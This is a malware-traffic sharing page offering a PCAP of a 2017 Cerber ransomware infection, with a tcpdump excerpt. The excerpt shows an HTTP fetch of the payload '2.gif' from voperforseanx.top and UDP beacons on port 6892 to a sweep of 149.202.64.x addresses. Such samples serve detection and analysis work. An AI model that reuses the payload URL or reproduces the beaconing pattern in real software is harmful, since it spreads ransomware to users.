CERBER Ransomware voperforseanx.top 2.gif Malware Analysis PCAP file Download Traffic Sample

Download Attachments

  • 1 pcap 2gif
    Date added: March 25, 2017 2:15 am Added by: admin File size: 377 KB Downloads: 63

2017-03-24 21:33:08.433085 IP 192.168.1.102.52862 > 47.90.205.113.80: Flags [P.], seq 0:296, ack 1, win 256, length 296: HTTP: GET /user.php?f=2.gif HTTP/1.1
E..P.F@…+….f/Z.q.~.P…….gP…7K..GET /user.php?f=2.gif HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: voperforseanx.top
Connection: Keep-Alive

 

2017-03-24 21:34:18.965418 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 84798, win 32768, length 0
E..(2.@…s….f.O……1.B…b^P…R………
2017-03-24 21:34:18.965823 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 86258, win 32768, length 0
E..(2.@…s….f.O……1.B…h.P…M………
2017-03-24 21:34:18.966006 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 87718, win 32768, length 0
E..(2.@…s….f.O……1.B…m.P…GM……..
2017-03-24 21:34:18.969465 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 89178, win 32768, length 0
E..(2.@…s….f.O……1.B…szP…A………
2017-03-24 21:34:18.969858 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 90638, win 32768, length 0
E..(2.@…s….f.O……1.B…y.P…;………
2017-03-24 21:34:18.969871 IP 192.168.1.102.52879 > 204.79.197.213.443: Flags [.], ack 91215, win 32695, length 0
E..(2.@…s….f.O……1.B…{oP…9………
2017-03-24 21:34:31.818161 IP 192.168.1.102.56966 > 149.202.64.0.6892: UDP, length 27
E..7.t…..i…f..@……#.(e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818169 IP 192.168.1.102.56966 > 149.202.64.1.6892: UDP, length 27
E..7n…..5….f..@……#.’e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818170 IP 192.168.1.102.56966 > 149.202.64.2.6892: UDP, length 27
E..7;*….h….f..@……#.&e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818260 IP 192.168.1.102.56966 > 149.202.64.3.6892: UDP, length 27
E..7]…..FG…f..@……#.%e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818268 IP 192.168.1.102.56966 > 149.202.64.4.6892: UDP, length 27
E..7Q…..Q….f..@……#.$e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818300 IP 192.168.1.102.56966 > 149.202.64.5.6892: UDP, length 27
E..77g….lq…f..@……#.#e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818312 IP 192.168.1.102.56966 > 149.202.64.6.6892: UDP, length 27
E..7b…..AK…f..@……#.”e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818402 IP 192.168.1.102.56966 > 149.202.64.7.6892: UDP, length 27
E..7.E………f..@……#.!e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818405 IP 192.168.1.102.56966 > 149.202.64.8.6892: UDP, length 27
E..7d…..?*…f..@……#. e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818468 IP 192.168.1.102.56966 > 149.202.64.9.6892: UDP, length 27
E..7.$………f..@     …..#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818471 IP 192.168.1.102.56966 > 149.202.64.10.6892: UDP, length 27
E..7X   ….K….f..@
…..#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818521 IP 192.168.1.102.56966 > 149.202.64.11.6892: UDP, length 27
E..71R….r….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818593 IP 192.168.1.102.56966 > 149.202.64.12.6892: UDP, length 27
E..7=…..f….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818621 IP 192.168.1.102.56966 > 149.202.64.13.6892: UDP, length 27
E..7[…..H….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818623 IP 192.168.1.102.56966 > 149.202.64.14.6892: UDP, length 27
E..7._…..p…f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818705 IP 192.168.1.102.56966 > 149.202.64.15.6892: UDP, length 27
E..7h…..:….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818706 IP 192.168.1.102.56966 > 149.202.64.16.6892: UDP, length 27
E..7>/….e….f..@……#..e008b81bf47e0446950100000f9
2017-03-24 21:34:31.818786 IP 192.168.1.102.56966 > 149.202.64.17.6892: UDP, length 27
E..7X…..K….f..@……#..e008b81bf47e0446950100000f9

Leave a Reply